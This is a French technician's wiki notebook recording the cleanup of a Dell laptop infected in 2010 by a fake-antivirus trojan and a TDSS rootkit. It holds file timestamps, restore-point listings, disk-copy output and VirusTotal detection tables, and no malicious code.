AntiGuide:RogueDell630Ak

Cet incident est rapporté sur trois pages, ne manquez pas la fin; voir la suite en BsodD630AK
à placer: peut-être pafois impossible ouvrir certaines fenêtres
le titre ne le dit pas mais il y avait aussi un RootKit!
Résumé

les photos (réparation): votre fichier "20100821_attaque_flora.zip" sera accessible à l'adresse suivante: http://dl.free.fr/iY4KwQauA (jusqu'au 20100920!)
FAUT REMETTRE NORTON LABO (actuellement NIS 30 jours! --> 20 Septembre 2010)
un virus assez récent (20100805), installé dans la session
signatures de norton pas jeunes (relire date sur photos, infection "normale" si antérieure.)
un virus plus ancien (appdrv.sys) vu par norton mais à nettoyer manuellement, qui a pu s'installer car session avec droit d'administration (lire: MauditAdmin)
ET aussi: disque ntfs MAIS "partage de fichier simple": donc pas de contrôle d'accès aux fichiers (lire: MauditAdmin)
(manifeste plus tard): virus qui attaque explorer.exe (et l'antivirus le met en quarantaine), peut être TLDB3 ou 4 (propagation par P2P ?)
à noter le seul point de restauration est de 20100818 à 21:10, plutôt pas récents fichiers dans de point (voir plus bas)
ai supprimé le "partage de fichiers simple", ne devrait pas avoir d'inconvénient.
créé une session Annick_Admini, faudra retirer les droits d'administration à Annick (fait le 20081024 sans doute)
faudra vérifier que les points de restauration sont bien faits (20100826 enfin un de fait ce jour à 11:54, peut-$être avant réparation! en forcer un autre)

les épisodes suivants

l'attaque infecte Internet???? Explorer; norton le met en quarantaine; le relancer à la main par gestionnaire de tâches.

Windows Update sur la machine mal nettoyée plante le démarrage de Windows

Dell D630, disque 160 Go, labo, norton cnrs (V10.0, signatures ~14 aout), Xp pro, (dire SP)
20100819
affichage de panneaux d'avertissement, invitant à activer .... (photos sur tel alcatel otc po)
dont une page par IE qui se répète et quelques bulles près de la pendule
l'attaque date de 20100819 à 1 ou 2 heures du mat
pas de pb en mode sans échec
pas retrouvé d'historique de navigation (pour chercher site crapuleux)

fouille dans les fichiers

le 20100819 à 00:52 (GMT sans doute) fichier \ds\ak\localsettings\temp\
- wtpvaae.exe connu de symantec comme: WS.Reputation.1 (mais ni clamav ni de avast!)
- 8e.tmp (connu 6 fois); pas de symantec
- un autre 15 fois sauf symantec
le 20100819 à 02:52: fichier virus
à 14:52 (sauf faute de fuseau): APPDRV.SYS
à 18:46 (sauf erreur fuseau) ajgywb.sys
à 17:44: installation de "GamesBar" et plein de fichiers créés par InternetExplorer?
- recgerche google de gamesbar
  - lu: http://kerio.probb.fr/anciens-sujets-f19/infecter-et-supprimer-desinstaller-gamesbar-t1929.htm
  - le site pour le téléchargé (masacré): http://gamesbar@dot@updatestar@dot@com/fr
- dossier contient plein d'îcones
- lu: http://www.assistepc.com/forum/aide-sur-log-hijackthis-navipromo-gamebar-vt512.html
à 18:42: activité eudora
19:04: plein sous firefox

et le 18 ?

floracello
ccleaner ?

un seul point de restauration (RP1 daté: Aug 19 14:23 RP1 donc avant que j'arrive ?); mais peut-être 18:23 (j'y étais sans doute) mais plus récents des fichiers dedans de la veille à 20:10
rp.log 20100819-0109
comme si l'infection avait créé le seul point de sauvegarde existant)!
voici son contenu (knoppix heure de paris):

knoppix@Microknoppix:/media/sdb2/System Volume Information/_restore{340C3340-2EBB-4324-859A-C37E85627171}/RP1$ ls -altr
total 17712
-rwxrwxrwx 1 root root    1459 19 aoû  2004 A0000074.lnk
-rwxrwxrwx 1 root root   16128 12 aoû  2005 A0000097.SYS
-rwxrwxrwx 1 root root   16128 12 aoû  2005 A0000081.SYS
-rwxrwxrwx 1 root root   16128 12 aoû  2005 A0000063.SYS
-rwxrwxrwx 1 root root   16128 12 aoû  2005 A0000049.SYS
-rwxrwxrwx 1 root root   16128 12 aoû  2005 A0000037.SYS
-rwxrwxrwx 1 root root   16128 12 aoû  2005 A0000025.SYS
-rwxrwxrwx 1 root root   16128 12 aoû  2005 A0000013.SYS
-rwxrwxrwx 1 root root  933451 17 mai 08:00 A0000115.VXD
-rwxrwxrwx 1 root root   30794 17 mai 08:00 A0000112.VXD
-rwxrwxrwx 1 root root  275824 17 mai 08:00 A0000107.DLL
-rwxrwxrwx 1 root root    6899 17 mai 08:00 A0000106.VXD
-rwxrwxrwx 1 root root     581  8 jun 08:00 A0000120.INF
-rwxrwxrwx 1 root root    7829  8 jun 08:00 A0000119.CAT
-rwxrwxrwx 1 root root  102448  8 jun 08:00 A0000110.SYS
-rwxrwxrwx 1 root root    5592  8 jun 08:00 A0000109.SPM
-rwxrwxrwx 1 root root  371248  8 jun 08:00 A0000108.SYS
-rwxrwxrwx 1 root root 2772016  8 jun 08:00 A0000105.DLL
-rwxrwxrwx 1 root root  102448  8 jun 08:00 A0000009.sys
-rwxrwxrwx 1 root root    1073 16 jui 08:00 A0000118.INF
-rwxrwxrwx 1 root root    8719 16 jui 08:00 A0000117.CAT
-rwxrwxrwx 1 root root 1713520 16 jui 08:00 A0000116.DLL
-rwxrwxrwx 1 root root 1362608 16 jui 08:00 A0000114.SYS
-rwxrwxrwx 1 root root  177520 16 jui 08:00 A0000113.DLL
-rwxrwxrwx 1 root root   85424 16 jui 08:00 A0000111.SYS
-rwxrwxrwx 1 root root  106244  7 aoû 08:00 A0000121.INF
-rwxrwxrwx 1 root root  556032 17 aoû 07:31 A0000145.exe
-rwxrwxrwx 1 root root   13277 17 aoû 17:41 A0000142.ini (paramètres eudora)
-rwxrwxrwx 1 root root 1748893 18 aoû 19:59 A0000058.mfl
-rwxrwxrwx 1 root root     728 18 aoû 22:33 A0000138.cfg
-rwxrwxrwx 1 root root     181 18 aoû 22:34 A0000140.cfg
-rwxrwxrwx 1 root root     181 18 aoû 22:35 A0000141.cfg
-rwxrwxrwx 1 root root      33 18 aoû 22:35 A0000139.cfg
-rwxrwxrwx 1 root root     100 19 aoû 00:52 A0000136.ini
-rwxrwxrwx 1 root root  254976 19 aoû 00:52 A0000075.exe
-rwxrwxrwx 1 root root     100 19 aoû 00:52 A0000057.ini
-rwxrwxrwx 1 root root 1057280 19 aoû 00:52 A0000076.exe   (virustotal note 1)
-rwxrwxrwx 1 root root    1224 19 aoû 00:58 A0000007.lnk
-rwxrwxrwx 1 root root    1258 19 aoû 00:58 A0000006.lnk
-rwxrwxrwx 1 root root    2294 19 aoû 00:58 A0000005.lnk
-rwxrwxrwx 1 root root    1258 19 aoû 00:58 A0000004.lnk
-rwxrwxrwx 1 root root    1246 19 aoû 00:58 A0000003.lnk
-rwxrwxrwx 1 root root     284 19 aoû 01:04 A0000008.ini
-rwxrwxrwx 1 root root      62 19 aoû 01:05 A0000010.ini
-rwxrwxrwx 1 root root      62 19 aoû 01:05 A0000011.ini
-rwxrwxrwx 1 root root    4334 19 aoû 01:05 A0000012.ini  (inboxlog.txt en 16bits)
-rwxrwxrwx 1 root root      62 19 aoû 01:05 A0000014.ini
-rwxrwxrwx 1 root root     179 19 aoû 01:07 A0000017.lnk
-rwxrwxrwx 1 root root     120 19 aoû 01:07 A0000015.ini
-rwxrwxrwx 1 root root      94 19 aoû 01:07 A0000016.ini
-rwxrwxrwx 1 root root    1250 19 aoû 01:07 A0000104.ini
-rwxrwxrwx 1 root root    2621 19 aoû 01:08 A0000018.ini
-rwxrwxrwx 1 root root     485 19 aoû 01:08 A0000002.cfg
-rwxrwxrwx 1 root root       0 19 aoû 01:08 A0000020.cfg
-rwxrwxrwx 1 root root      65 19 aoû 01:08 A0000001.ini
drwxrwxrwx 1 root root    4096 19 aoû 01:09 ..
drwxrwxrwx 1 root root    8192 19 aoû 01:09 snapshot
-rwxrwxrwx 1 root root     536 19 aoû 01:09 rp.log
-rwxrwxrwx 2 root root       8 19 aoû 01:09 RestorePointSize
-rwxrwxrwx 1 root root      65 19 aoû 01:10 A0000143.ini
-rwxrwxrwx 1 root root     485 19 aoû 01:12 A0000019.cfg
-rwxrwxrwx 1 root root     284 19 aoû 01:15 A0000021.ini
-rwxrwxrwx 2 root root    9566 19 aoû 01:15 change.log.1
-rwxrwxrwx 1 root root      62 19 aoû 01:16 A0000022.ini
-rwxrwxrwx 1 root root      62 19 aoû 01:16 A0000023.ini
-rwxrwxrwx 1 root root    4334 19 aoû 01:16 A0000024.ini
-rwxrwxrwx 1 root root      62 19 aoû 01:16 A0000026.ini
-rwxrwxrwx 1 root root     120 19 aoû 01:17 A0000027.ini
-rwxrwxrwx 1 root root      94 19 aoû 01:18 A0000029.ini
-rwxrwxrwx 1 root root     179 19 aoû 01:18 A0000028.lnk
-rwxrwxrwx 1 root root    2621 19 aoû 01:18 A0000030.ini
-rwxrwxrwx 1 root root     485 19 aoû 01:18 A0000031.cfg
-rwxrwxrwx 1 root root       0 19 aoû 01:18 A0000032.cfg
-rwxrwxrwx 1 root root     284 19 aoû 01:27 A0000033.ini
-rwxrwxrwx 2 root root   87178 19 aoû 01:27 change.log.2
-rwxrwxrwx 1 root root      62 19 aoû 08:10 A0000034.ini
-rwxrwxrwx 1 root root      62 19 aoû 08:10 A0000035.ini
-rwxrwxrwx 1 root root    4334 19 aoû 08:10 A0000036.ini
-rwxrwxrwx 1 root root      62 19 aoû 08:10 A0000038.ini
-rwxrwxrwx 1 root root     120 19 aoû 08:11 A0000039.ini
-rwxrwxrwx 1 root root      94 19 aoû 08:11 A0000041.ini
-rwxrwxrwx 1 root root     179 19 aoû 08:11 A0000040.lnk
-rwxrwxrwx 1 root root    2621 19 aoû 08:12 A0000042.ini
-rwxrwxrwx 1 root root     485 19 aoû 08:12 A0000043.cfg
-rwxrwxrwx 1 root root       0 19 aoû 08:12 A0000044.cfg
-rwxrwxrwx 1 root root     284 19 aoû 08:13 A0000045.ini
-rwxrwxrwx 2 root root   18812 19 aoû 08:13 change.log.3
-rwxrwxrwx 1 root root      62 19 aoû 08:19 A0000046.ini
-rwxrwxrwx 1 root root      62 19 aoû 08:19 A0000047.ini
-rwxrwxrwx 1 root root    4334 19 aoû 08:19 A0000048.ini
-rwxrwxrwx 1 root root      62 19 aoû 08:19 A0000050.ini
-rwxrwxrwx 1 root root     120 19 aoû 08:20 A0000051.ini
-rwxrwxrwx 1 root root     179 19 aoû 08:20 A0000052.lnk
-rwxrwxrwx 1 root root      94 19 aoû 08:20 A0000053.ini
-rwxrwxrwx 1 root root    2621 19 aoû 08:20 A0000054.ini
-rwxrwxrwx 1 root root     485 19 aoû 08:20 A0000055.cfg
-rwxrwxrwx 1 root root       0 19 aoû 08:20 A0000056.cfg
-rwxrwxrwx 1 root root     284 19 aoû 08:23 A0000059.ini
-rwxrwxrwx 2 root root   18340 19 aoû 08:23 change.log.4
-rwxrwxrwx 1 root root      62 19 aoû 12:19 A0000060.ini
-rwxrwxrwx 1 root root      62 19 aoû 12:19 A0000061.ini
-rwxrwxrwx 1 root root    4334 19 aoû 12:19 A0000062.ini
-rwxrwxrwx 1 root root      62 19 aoû 12:19 A0000064.ini
-rwxrwxrwx 1 root root     120 19 aoû 12:20 A0000065.ini
-rwxrwxrwx 1 root root     179 19 aoû 12:20 A0000066.lnk
-rwxrwxrwx 1 root root      94 19 aoû 12:20 A0000067.ini
-rwxrwxrwx 1 root root    2621 19 aoû 12:20 A0000069.ini
-rwxrwxrwx 1 root root     485 19 aoû 12:20 A0000068.cfg
-rwxrwxrwx 1 root root       0 19 aoû 12:21 A0000070.cfg
-rwxrwxrwx 1 root root 1831705 19 aoû 13:55 A0000122.mfl
-rwxrwxrwx 1 root root     284 19 aoû 14:02 A0000071.ini
-rwxrwxrwx 2 root root   19888 19 aoû 14:02 change.log.5
-rwxrwxrwx 1 root root      62 19 aoû 14:03 A0000072.ini
-rwxrwxrwx 1 root root      62 19 aoû 14:03 A0000079.ini
-rwxrwxrwx 1 root root    4334 19 aoû 14:04 A0000080.ini
-rwxrwxrwx 1 root root      62 19 aoû 14:04 A0000073.ini
-rwxrwxrwx 1 root root     120 19 aoû 14:04 A0000083.ini
-rwxrwxrwx 1 root root     179 19 aoû 14:04 A0000084.lnk
-rwxrwxrwx 1 root root      94 19 aoû 14:04 A0000085.ini
-rwxrwxrwx 1 root root     485 19 aoû 14:05 A0000086.cfg
-rwxrwxrwx 1 root root    2621 19 aoû 14:05 A0000087.ini
-rwxrwxrwx 1 root root       0 19 aoû 14:05 A0000088.cfg
-rwxrwxrwx 1 root root     284 19 aoû 14:07 A0000077.ini
-rwxrwxrwx 2 root root   18340 19 aoû 14:07 change.log.6
-rwxrwxrwx 1 root root      62 19 aoû 14:09 A0000078.ini
-rwxrwxrwx 1 root root      62 19 aoû 14:09 A0000082.ini
-rwxrwxrwx 1 root root     284 19 aoû 14:26 A0000089.ini
-rwxrwxrwx 2 root root    4828 19 aoû 14:26 change.log.7
-rwxrwxrwx 1 root root      62 19 aoû 14:27 A0000090.ini
-rwxrwxrwx 1 root root      62 19 aoû 14:27 A0000094.ini
-rwxrwxrwx 1 root root    4334 19 aoû 14:27 A0000095.ini
-rwxrwxrwx 1 root root      62 19 aoû 14:27 A0000091.ini
-rwxrwxrwx 1 root root     120 19 aoû 14:28 A0000098.ini
-rwxrwxrwx 1 root root     179 19 aoû 14:28 A0000099.lnk
-rwxrwxrwx 1 root root      94 19 aoû 14:28 A0000100.ini
-rwxrwxrwx 1 root root     485 19 aoû 14:29 A0000101.cfg
-rwxrwxrwx 1 root root    2621 19 aoû 14:29 A0000103.ini
-rwxrwxrwx 1 root root       0 19 aoû 14:29 A0000102.cfg
-rwxrwxrwx 1 root root     284 19 aoû 14:30 A0000092.ini
-rwxrwxrwx 2 root root   18340 19 aoû 14:30 change.log.8
-rwxrwxrwx 1 root root      62 19 aoû 14:31 A0000093.ini
-rwxrwxrwx 1 root root      62 19 aoû 14:32 A0000096.ini
-rwxrwxrwx 1 root root     284 19 aoû 14:35 A0000123.ini
-rwxrwxrwx 2 root root    2988 19 aoû 14:35 change.log.9
-rwxrwxrwx 1 root root      62 19 aoû 14:36 A0000124.ini
-rwxrwxrwx 1 root root      62 19 aoû 14:36 A0000125.ini
-rwxrwxrwx 1 root root    4334 19 aoû 14:36 A0000127.ini
-rwxrwxrwx 1 root root      62 19 aoû 14:36 A0000126.ini
-rwxrwxrwx 1 root root     120 19 aoû 14:37 A0000129.ini
-rwxrwxrwx 1 root root     179 19 aoû 14:37 A0000130.lnk
-rwxrwxrwx 1 root root      94 19 aoû 14:37 A0000131.ini
-rwxrwxrwx 1 root root     485 19 aoû 14:37 A0000133.cfg
-rwxrwxrwx 1 root root       0 19 aoû 14:38 A0000135.cfg
-rwxrwxrwx 1 root root    2621 19 aoû 14:38 A0000134.ini
-rwxrwxrwx 1 root root    1250 19 aoû 14:49 A0000132.ini
-rwxrwxrwx 1 root root   16128 19 aoû 14:52 A0000149.SYS
-rwxrwxrwx 1 root root   16128 19 aoû 14:52 A0000128.SYS
-rwxrwxrwx 1 root root 1831705 19 aoû 15:07 A0000137.mfl
-rwxrwxrwx 1 root root     284 19 aoû 15:21 A0000144.ini
-rwxrwxrwx 2 root root  148268 19 aoû 15:21 change.log.10
-rwxrwxrwx 1 root root      62 19 aoû 15:22 A0000146.ini
-rwxrwxrwx 1 root root      62 19 aoû 15:22 A0000147.ini
-rwxrwxrwx 1 root root      62 19 aoû 15:22 A0000150.ini
-rwxrwxrwx 1 root root    4334 19 aoû 15:22 A0000148.ini
-rwxrwxrwx 1 root root     120 19 aoû 15:23 A0000151.ini
-rwxrwxrwx 1 root root     179 19 aoû 15:23 A0000152.lnk
-rwxrwxrwx 1 root root      94 19 aoû 15:23 A0000153.ini
-rwxrwxrwx 1 root root    1250 19 aoû 15:23 A0000154.ini
-rwxrwxrwx 1 root root     485 19 aoû 15:23 A0000155.cfg
-rwxrwxrwx 1 root root    2621 19 aoû 15:24 A0000157.ini
-rwxrwxrwx 1 root root       0 19 aoû 15:24 A0000156.cfg
-rwxrwxrwx 1 root root     100 19 aoû 15:24 A0000158.ini
-rwxrwxrwx 1 root root     728 19 aoû 16:37 A0000160.cfg
-rwxrwxrwx 1 root root     181 19 aoû 16:38 A0000162.cfg
-rwxrwxrwx 1 root root     181 19 aoû 16:39 A0000163.cfg
-rwxrwxrwx 1 root root      33 19 aoû 16:39 A0000161.cfg
-rwxrwxrwx 1 root root 1858700 19 aoû 17:33 A0000159.mfl
-rwxrwxrwx 1 root root     284 19 aoû 17:55 A0000164.ini
-rwxrwxrwx 2 root root   61656 19 aoû 17:55 change.log.11
drwxrwxrwx 1 root root   45056 19 aoû 18:23 .
-rwxrwxrwx 1 root root   24070 19 aoû 18:46 change.log
knoppix@Microknoppix:/media/sdb2/System Volume Information/_restore{340C3340-2EBB-4324-859A-C37E85627171}/RP1$

que s'est il passé jeudi 14:23 (deuxième appel de GC)
norton ne voit rien , mais le compte des fichier s'arrête à 28000
et ne dure que quelquesminutes
dernière bonne conf connue: pas mieux
(pas fait autre recul du registre)
norton signale appdrv.sys mais ne le corrige pas

suppression de pas mal de clés "run"
laissé pas mal de fichiers en place ou xex
(les fichiers sont assez loin sous le compte "A... K..." )
firefox ni IE n'ont accès à internet
telnet port 80 OK
trouvé option "utiliser ... système"
remis à NO PROXY
OK.

norton (10), signale analyse d'email
puis email refusé (par norton ou free ?)

par le gestionnaire de tâche (74), fermé progressivement
suspect: un dnsredir ?

semble calmé

20100829-soir
20:30: c'est revenu
Salut,
les messages de symantec sont revenus.
Je suis allée sur internet, g. aussi, j'ai consulté mes mails sur gmail, puis facebook, apres j'ai voulu regardé des billets d 'avion pour g. sur opodo,firefox n'a pas voulu l'ouvrir en disant que le contenu de la page n'etait pas bon, et j'ai essayé d'aller sur le site de la TAP (le airfrance portugais) et on est arrivé sur un autre site...
Donc les messages incessants sont revenus..
voila!!
Bises
copie par dd sur 1 To rapporté du far-west (pcmcia sata, rack JS94), 31 Mo/s 4000s environ.

20100820
montage du 1 To dans le rack de DellE520
montage WD 160 "copie de orig... parait réparé" dans boitier JS94
un début de boot windows intempestif sur la copie 1To, arrêt par hard-reset (10 sec sur On/Off)

copie par dd, vitesse 106 Mo/s, donc sans doute 1600"
dd: écriture de `/dev/sdb': Aucun espace disponible sur le périphérique
156291+0 enregistrements lus
156290+0 enregistrements écrits
160041885696 bytes (160 GB) copied, 1796,42 s, 89,1 MB/s

puis freshclam...
re:
knoppix@Knoppix:~$ sudo freshclam
ClamAV update process started at Fri Aug 20 06:49:24 2010
main.inc is up to date (version: 52, sigs: 704727, f-level: 44, builder: sven)
WARNING: Current functionality level = 26, recommended = 44
Please check if ClamAV tools are linked against the proper version of libclamav
DON'T PANIC! Read http://www.clamav.net/support/faq
daily.cvd is up to date (version: 11600, sigs: 112589, f-level: 53, builder: guitar)
WARNING: Current functionality level = 26, recommended = 53
Please check if ClamAV tools are linked against the proper version of libclamav
DON'T PANIC! Read http://www.clamav.net/support/faq
knoppix@Knoppix:~$

faut mettre à jour clamav (le CD en 0.94 n'est plus compatible avec les signatures)

sdb monte un sdb3 sur le bureau mais pas vu par fdisk, en fait date d'avant la copie! nul!
reboot
ntfs-3g de sdb2 -o ro

repris fichier .xex : "Documents and settings/A.... K...../Local Settings/Application Data/kkweecltk/vrpvpinshdw.xex"
archive virustotal
peu connu (photo sur OTC...)

nouvelle soumission à virus total

File name:
vaeoxlpshdw.exe
Submission date:
2010-08-20 05:30:24 (UTC)
Current status:
queued (#2) queued (#2) analysing finished
Result:
21/ 41 (51.2%)

VT Community

not reviewed

Safety score: -
Compact
Print results
Antivirus Version Last Update Result
AhnLab?-V3 2010.08.20.00 2010.08.19 -
AntiVir? 8.2.4.38 2010.08.19 TR/Drop.FrauDrop?.bay
Antiy-AVL 2.0.3.7 2010.08.16 -
Authentium 5.2.0.5 2010.08.20 -
Avast 4.8.1351.0 2010.08.19 Win32?:Trojan-gen
Avast5? 5.0.332.0 2010.08.19 Win32?:Trojan-gen
AVG 9.0.0.851 2010.08.19 FakeAV?.CUU
BitDefender 7.2 2010.08.20 -
CAT-QuickHeal? 11.00 2010.08.19 -
ClamAV 0.96.2.0-git 2010.08.20 -
Comodo 5791 2010.08.20 -
DrWeb? 5.0.2.03300 2010.08.20 Trojan.MulDrop1?.42420
Emsisoft 5.0.0.37 2010.08.20 Trojan-Dropper.Win32?.FrauDrop?!IK
eTrust-Vet 36.1.7801 2010.08.19 Win32?/FakeAV?.CZT
F-Prot 4.6.1.107 2010.08.19 -
F-Secure 9.0.15370.0 2010.08.20 -
Fortinet 4.1.143.0 2010.08.19 -
GData 21 2010.08.20 Win32?:Trojan-gen
Ikarus T3.1.1.88.0 2010.08.20 Trojan-Dropper.Win32?.FrauDrop?
Jiangmin 13.0.900 2010.08.19 -
Kaspersky 7.0.0.125 2010.08.20 Trojan-Dropper.Win32?.FrauDrop?.bay
McAfee 5.400.0.1158 2010.08.20 Artemis!58C266F4D871
McAfee-GW-Edition 2010.1B 2010.08.20 Artemis!58C266F4D871
Microsoft 1.6103 2010.08.20 Rogue:Win32 (interwiki)/Winwebsec
NOD32 5380 2010.08.19 Win32?/Adware.SpywareProtect2009?
Norman 6.05.11 2010.08.19 -
nProtect 2010-08-19.01 2010.08.19 -
Panda 10.0.2.7 2010.08.19 -
PCTools 7.0.3.5 2010.08.20 Trojan.FakeAV?
Prevx 3.0 2010.08.20 High Risk Cloaked Malware
Rising 22.61.04.01 2010.08.20 -
Sophos 4.56.0 2010.08.20 Mal/FakeAV?-DO
Sunbelt 6764 2010.08.20 Trojan.Win32?.Generic.pak!cobra
SUPERAntiSpyware 4.40.0.1006 2010.08.20 Trojan.Agent/Gen-FakeAlert?
Symantec 20101.1.1.7 2010.08.20 Trojan.FakeAV?!gen38
TheHacker? 6.5.2.1.352 2010.08.20 Trojan/Dropper.FrauDrop?.bay
TrendMicro? 9.120.0.1004 2010.08.20 -
TrendMicro?-HouseCall? 9.120.0.1004 2010.08.20 -
VBA32 3.12.14.0 2010.08.20 -
ViRobot? 2010.8.18.3995 2010.08.20 -
VirusBuster? 5.0.27.0 2010.08.19 -
Additional information

donc PAS CONNU DE CLAMAV! à cette heure, un peu inutile de continuer! bof, c'est tellement plus beau quand c'est inutile.

lu chez symantec, date du 5 aout 2010
http://www.symantec.com/security_response/writeup.jsp?docid=2010-080511-2423-99&tabid=2

APPDRV.SYS
File name:
APPDRV.SYS
Submission date:
2010-08-20 05:55:16 (UTC)
Current status:
queued queued analysing finished
Result:
34/ 41 (82.9%)

VT Community

not reviewed

Safety score: -
Compact
Print results
Antivirus Version Last Update Result
AhnLab?-V3 2010.08.20.00 2010.08.19 Win-Trojan/TDSSPatched
AntiVir? 8.2.4.38 2010.08.19 TR/Patched.Gen
Antiy-AVL 2.0.3.7 2010.08.16 -
Authentium 5.2.0.5 2010.08.20 W32/Alureon.JIL
Avast 4.8.1351.0 2010.08.19 Win32?:Alureon-FZ
Avast5? 5.0.332.0 2010.08.19 Win32?:Alureon-FZ
AVG 9.0.0.851 2010.08.19 Win32?/Patched.DX
BitDefender 7.2 2010.08.20 Rootkit.Patched.TDSS.Gen
CAT-QuickHeal? 11.00 2010.08.19 Rootkit.TDSS.ap
ClamAV 0.96.2.0-git 2010.08.20 Trojan.TDSS-3754
Comodo 5791 2010.08.20 TrojWare?.Win32?.Rootkit.TDL3.gen
DrWeb? 5.0.2.03300 2010.08.20 BackDoor?.Tdss.2459
Emsisoft 5.0.0.37 2010.08.20 -
eTrust-Vet 36.1.7801 2010.08.19 Win32?/Alureon.D!generic
F-Prot 4.6.1.107 2010.08.19 W32/Alureon.JIL
F-Secure 9.0.15370.0 2010.08.20 Rootkit.Patched.TDSS.Gen
Fortinet 4.1.143.0 2010.08.19 -
GData 21 2010.08.20 Rootkit.Patched.TDSS.Gen
Ikarus T3.1.1.88.0 2010.08.20 -
Jiangmin 13.0.900 2010.08.19 Rootkit.TDSS.dgu
Kaspersky 7.0.0.125 2010.08.20 Virus.Win32?.TDSS.b
McAfee 5.400.0.1158 2010.08.20 Patched-SYSFile.d
McAfee-GW-Edition 2010.1B 2010.08.20 Patched-SYSFile.d
Microsoft 1.6103 2010.08.20 Virus:Win32 (interwiki)/Alureon.H
NOD32 5380 2010.08.19 Win32?/Olmarik.ZC
Norman 6.05.11 2010.08.19 W32/tdss.drv.gen8
nProtect 2010-08-19.01 2010.08.19 Trojan/W32.Rootkit.16128.E
Panda 10.0.2.7 2010.08.19 W32/Tdss.FE
PCTools 7.0.3.5 2010.08.20 Backdoor.Tidserv
Prevx 3.0 2010.08.20 Medium Risk Malware
Rising 22.61.04.01 2010.08.20 RootKit.Win32?.TDSS.c
Sophos 4.56.0 2010.08.20 Mal/TDSSRt-A
Sunbelt 6764 2010.08.20 LooksLike?.Win32?.PatchedDriver?!A (v)
SUPERAntiSpyware 4.40.0.1006 2010.08.20 -
Symantec 20101.1.1.7 2010.08.20 Backdoor.Tidserv.I!inf
TheHacker? 6.5.2.1.352 2010.08.20 -
TrendMicro? 9.120.0.1004 2010.08.20 PE_TDSS.A
TrendMicro?-HouseCall? 9.120.0.1004 2010.08.20 PE_TDSS.A
VBA32 3.12.14.0 2010.08.20 Rootkit.Win32?.TDSL.b
ViRobot? 2010.8.18.3995 2010.08.20 -
VirusBuster? 5.0.27.0 2010.08.19 Rootkit.TDSS.Gen.3
Additional information
Show all

lu chez symantec:
date de 2008
rootkit
a massacré fichier appdrv.sys , le restaurer à partir de i386. (sans douste \i386)
http://www.symantec.com/security_response/writeup.jsp?docid=2008-111113-1112-99

point de restauration

knoppix@Knoppix:/media/sdb2/System Volume Information/_restore{340C3340-2EBB-4324-859A-C37E85627171}/RP1$ ls -al
total 17712
drwxrwxrwx 1 root root   45056 Aug 19 14:23 .
drwxrwxrwx 1 root root    4096 Aug 18 21:09 ..
-rwxrwxrwx 1 root root      65 Aug 18 21:08 A0000001.ini
-rwxrwxrwx 1 root root     485 Aug 18 21:08 A0000002.cfg
-rwxrwxrwx 1 root root    1246 Aug 18 20:58 A0000003.lnk
-rwxrwxrwx 1 root root    1258 Aug 18 20:58 A0000004.lnk
-rwxrwxrwx 1 root root    2294 Aug 18 20:58 A0000005.lnk
-rwxrwxrwx 1 root root    1258 Aug 18 20:58 A0000006.lnk
-rwxrwxrwx 1 root root    1224 Aug 18 20:58 A0000007.lnk
-rwxrwxrwx 1 root root     284 Aug 18 21:04 A0000008.ini
-rwxrwxrwx 1 root root  102448 Jun  8 04:00 A0000009.sys
-rwxrwxrwx 1 root root      62 Aug 18 21:05 A0000010.ini
-rwxrwxrwx 1 root root      62 Aug 18 21:05 A0000011.ini
-rwxrwxrwx 1 root root    4334 Aug 18 21:05 A0000012.ini
-rwxrwxrwx 1 root root   16128 Aug 12  2005 A0000013.SYS
-rwxrwxrwx 1 root root      62 Aug 18 21:05 A0000014.ini
-rwxrwxrwx 1 root root     120 Aug 18 21:07 A0000015.ini
-rwxrwxrwx 1 root root      94 Aug 18 21:07 A0000016.ini
-rwxrwxrwx 1 root root     179 Aug 18 21:07 A0000017.lnk
-rwxrwxrwx 1 root root    2621 Aug 18 21:08 A0000018.ini
-rwxrwxrwx 1 root root     485 Aug 18 21:12 A0000019.cfg
-rwxrwxrwx 1 root root       0 Aug 18 21:08 A0000020.cfg
-rwxrwxrwx 1 root root     284 Aug 18 21:15 A0000021.ini
-rwxrwxrwx 1 root root      62 Aug 18 21:16 A0000022.ini
-rwxrwxrwx 1 root root      62 Aug 18 21:16 A0000023.ini
-rwxrwxrwx 1 root root    4334 Aug 18 21:16 A0000024.ini
-rwxrwxrwx 1 root root   16128 Aug 12  2005 A0000025.SYS
-rwxrwxrwx 1 root root      62 Aug 18 21:16 A0000026.ini
-rwxrwxrwx 1 root root     120 Aug 18 21:17 A0000027.ini
-rwxrwxrwx 1 root root     179 Aug 18 21:18 A0000028.lnk
-rwxrwxrwx 1 root root      94 Aug 18 21:18 A0000029.ini
-rwxrwxrwx 1 root root    2621 Aug 18 21:18 A0000030.ini
-rwxrwxrwx 1 root root     485 Aug 18 21:18 A0000031.cfg
-rwxrwxrwx 1 root root       0 Aug 18 21:18 A0000032.cfg
-rwxrwxrwx 1 root root     284 Aug 18 21:27 A0000033.ini
-rwxrwxrwx 1 root root      62 Aug 19 04:10 A0000034.ini
-rwxrwxrwx 1 root root      62 Aug 19 04:10 A0000035.ini
-rwxrwxrwx 1 root root    4334 Aug 19 04:10 A0000036.ini
-rwxrwxrwx 1 root root   16128 Aug 12  2005 A0000037.SYS
-rwxrwxrwx 1 root root      62 Aug 19 04:10 A0000038.ini
-rwxrwxrwx 1 root root     120 Aug 19 04:11 A0000039.ini
-rwxrwxrwx 1 root root     179 Aug 19 04:11 A0000040.lnk
-rwxrwxrwx 1 root root      94 Aug 19 04:11 A0000041.ini
-rwxrwxrwx 1 root root    2621 Aug 19 04:12 A0000042.ini
-rwxrwxrwx 1 root root     485 Aug 19 04:12 A0000043.cfg
-rwxrwxrwx 1 root root       0 Aug 19 04:12 A0000044.cfg
-rwxrwxrwx 1 root root     284 Aug 19 04:13 A0000045.ini
-rwxrwxrwx 1 root root      62 Aug 19 04:19 A0000046.ini
-rwxrwxrwx 1 root root      62 Aug 19 04:19 A0000047.ini
-rwxrwxrwx 1 root root    4334 Aug 19 04:19 A0000048.ini
-rwxrwxrwx 1 root root   16128 Aug 12  2005 A0000049.SYS
-rwxrwxrwx 1 root root      62 Aug 19 04:19 A0000050.ini
-rwxrwxrwx 1 root root     120 Aug 19 04:20 A0000051.ini
-rwxrwxrwx 1 root root     179 Aug 19 04:20 A0000052.lnk
-rwxrwxrwx 1 root root      94 Aug 19 04:20 A0000053.ini
-rwxrwxrwx 1 root root    2621 Aug 19 04:20 A0000054.ini
-rwxrwxrwx 1 root root     485 Aug 19 04:20 A0000055.cfg
-rwxrwxrwx 1 root root       0 Aug 19 04:20 A0000056.cfg
-rwxrwxrwx 1 root root     100 Aug 18 20:52 A0000057.ini
-rwxrwxrwx 1 root root 1748893 Aug 18 15:59 A0000058.mfl
